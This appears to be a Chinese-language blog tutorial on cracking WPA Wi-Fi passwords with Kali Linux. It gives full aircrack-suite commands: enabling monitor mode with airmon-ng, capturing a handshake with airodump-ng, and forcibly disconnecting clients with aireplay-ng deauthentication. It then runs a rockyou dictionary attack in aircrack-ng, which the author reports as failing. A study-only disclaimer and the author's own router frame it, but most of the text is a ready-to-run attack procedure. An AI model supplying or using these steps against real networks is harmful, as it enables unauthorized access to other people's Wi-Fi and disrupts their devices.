安全系列之wifi破解思路
聲明:此文章僅供研究學習和技術交流,請勿用於破解他人 WIFI 密碼!違反法律,一切後果自負!
一.準備工作
1. 硬件準備
- 無線網卡:一般筆記本自帶的無線網卡不支持監聽模式,所以要使用一個外置的無線網卡,這裏推薦購買3070或者8187芯片的外置USB無線網卡,8187L芯片是一種內含集成電路的矽片,是一種大功率無線網卡的首腦部分,常被用做“蹭網卡”芯片。具有體積小,輻射大,使用價值高等特點。
2. 軟件準備
- 操作系統: https://www.kali.org/downloads/ ,在kail linux上載最新的鏡像,kail linux中自帶很多工具
- 虛擬機軟件:vmware或virtualbox
二.安裝kail linux
1.在vmare中創建虛擬這步就省略,網絡連接橋接和NAT都可以,只是稍微提註意的是版本選擇是先debian,和在顯示器可以調整開啟“加速3D圖形”,圖形內存改成 “1G”,這是為了以後能使用GPU破解wifi密碼做的準備
2. kail linux的過程也是比較長,可以參考官方文檔的https://docs.kali.org/installation/kali-linux-hard-disk-install
三.kail linux上的基本配置
1. 檢查下kail linux的版本
root@kail:~# lsb_release -a No LSB modules are available. Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: kali-rolling Codename: kali-rolling
註釋: Kali雖然是基於Debian的一個linux版本,但它卻不同於Debian7,8,9等這些版本,並且和以前采用的測試方法也不同。不再采用那些,有時被認為是全新的,主流的,有時又是過時的循環軟件測試。Kali Rolling是Debian的即時更新版,只要Debian中有更新,更新包就會放入Kali Rolling中,供用戶下載使用。它為提用戶提供了一個穩定更新的版本,同時會帶有最新的更新安裝包。在過去的5個月中,只要是對該工具進行了更新,系統都會在第一時間自動發出通知,這是Kali Rolling的一大特色。並且確保了Kali Rolling工具庫中的監控工具總是維持在最新版本,為用戶的使用提供了很大的便利。
2.更新系統的安裝源
root@kail:~# vim /etc/apt/sources.list #ustc deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #aliyun deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
3.更新系統,註意使用的時間比較長,而且如果更新沒完成,可以會導致以下操作中有些工具無法使用
root@kail:~# apt-get update && apt-get upgrade && apt-get dist-upgrade 報錯處理: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) E: Unable to lock the administration di 解決方案: 其實這是因為有另外一個程序在運行,導致鎖不可用。原因可能是上次運行更新或安裝沒有正常完成。解決辦法是殺死此進程 sudo rm /var/cache/apt/archives/lock sudo rm /var/lib/dpkg/lock 但是這樣不能解決問題:可能還會出現問題,解決方案: 1,sudo dpkg --configure -a 2,sudo apt-get update
4.安裝vmwaretools,完成後並重啟系統
- 先把虛擬機的鏡像彈出,設置到CD/DVD進行自動檢測,
- 安裝linux的內核頭文件
root@kail:~# apt-get install linux-headers-$(uname -r)
- 加載vmware-tools: vmware ----> 點擊導航中的虛擬機---->安裝VMware Tools(T)
- 安裝vmware tools,以下是針對個人情況,可以參考vm官方文檔
#點擊安裝的按鈕後,軟件會自動掛載 root@kail:~# mount /dev/sr0 on /media/cdrom0 type iso9660 (ro,nosuid,nodev,noexec,relatime,nojoliet,check=s,map=n,blocksize=2048,user) root@kail:~# ls /media/cdrom0/ manifest.txt VMwareTools-10.0.5-3228253.tar.gz vmware-tools-upgrader-64 run_upgrader.sh vmware-tools-upgrader-32 #把tool拷貝到自己的目錄下 root@kail:~# cp /media/cdrom0/VMwareTools-10.0.5-3228253.tar.gz /home/ root@kail:~# cd /home/ #解壓安裝 root@kail:/home# tar xf VMwareTools-10.0.5-3228253.tar.gz root@kail:/home# cd vmware-tools-distrib/ root@kail:/home/vmware-tools-distrib# ./vmware-install.pl Enjoy, --the VMware team Found VMware Tools CDROM mounted at /media/cdrom0. Ejecting device /dev/sr0 ...
5.接入8187無線網卡(這步可以事先做好)
- 插入計算機後,系統會自動安裝驅動,如找不到相應的驅動需要自行上網下載
- vmware右下方會出現一個USB形狀的圖標,選擇連接8187(或者導航中的虛擬機--》可移動設備),確保以上都能操作好,否則可以沒法顯示無線網卡
四.抓取wifi的數據包
1.檢查無線網卡的狀態(確保可以顯示wlan0)
root@kail:~# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off 註:此時wlan0是manged模式
2. 開啟wlan0的監控模式
root@kail:~# airmon-ng start wlan0 Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run ‘airmon-ng check kill‘ PID Name 484 NetworkManager 523 dhclient 717 wpa_supplicant PHY Interface Driver Chipset phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187 (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
3.監聽周圍的無線
root@kail:~# airodump-ng wlan0mon
註:這裏li是自己路由器,把BSSID和頻道(CH)號,ESSID記錄下來
4.使用無線網卡抓取握手包。所謂握手包,就是包含密碼的包,當有新用戶或斷開用戶自動連接wifi時,會發送握手包。
root@kail:~# airodump-ng -c 9 --bssid B0:48:7A:??:??:?? -w ~/test wlan0mon -c指定頻道號 bssid指定路由器bssid w指定抓取的數據包保存位置,~/test表示存在root/目錄下,並且包的名稱以test-xx.cap的格式儲存。
5.設法讓設備重新連接wifi,直接出現WPA handshake為止
兩條命令一樣: root@kail:~# aireplay-ng -0 10 -a B0:48:7A:??:??:?? -c 4C:34:88:??:??:?? wlan0mon root@kail:~# aireplay-ng -0 5 -a B0:48:7A:??:??:?? wlan0mon (兩個命令都可以,可能要多試幾次) 0表示發起deauthentication攻擊 10代表攻擊10次 a指定無線路由器BSSID,也就是路由器的MAC地址 c指定強制斷開的設備,也就是STATION的MAC地址 註:這裏需要使用重新連接,但是一般情況下等待比較長,因為自身就是設備,可以讓設備自行下線,起deauthentication攻擊,然後抓取它的握手包.aireplay-ng的工具,它可以強制用戶斷開wifi連接,具體方法是:給連接到wifi的一個設備發送一個deauth(反認證)包,讓那個設備斷開wifi,隨後設備會再次連接wifi,這樣我們就能順利而快速的抓到握手包了。
6.關閉無線網卡監聽模式(抓取到握手包後)
root@kail:~# airmon-ng stop wlan0mon
五.使用kail linux自帶工具破解
1.解壓kail linux自帶密碼字典(註意: 無線的密碼有可能在字典中找不到)
root@kail:~# gzip -d /usr/share/wordlists/rockyou.txt.gz
2.分析破解握手包中的密碼
root@kail:~# aircrack-ng -a2 -b B0:48:??:??:???? -w /usr/share/wordlists/rockyou.txt ~/test-01.cap 參數解釋: a2代表WPA的握手包 b指定要破解的wifi BSSID。 w指定字典文件 最後是抓取的包路徑
3. 以下的破解的過程,花費了三個多小時,最終沒有破解成功
安全系列之wifi破解思路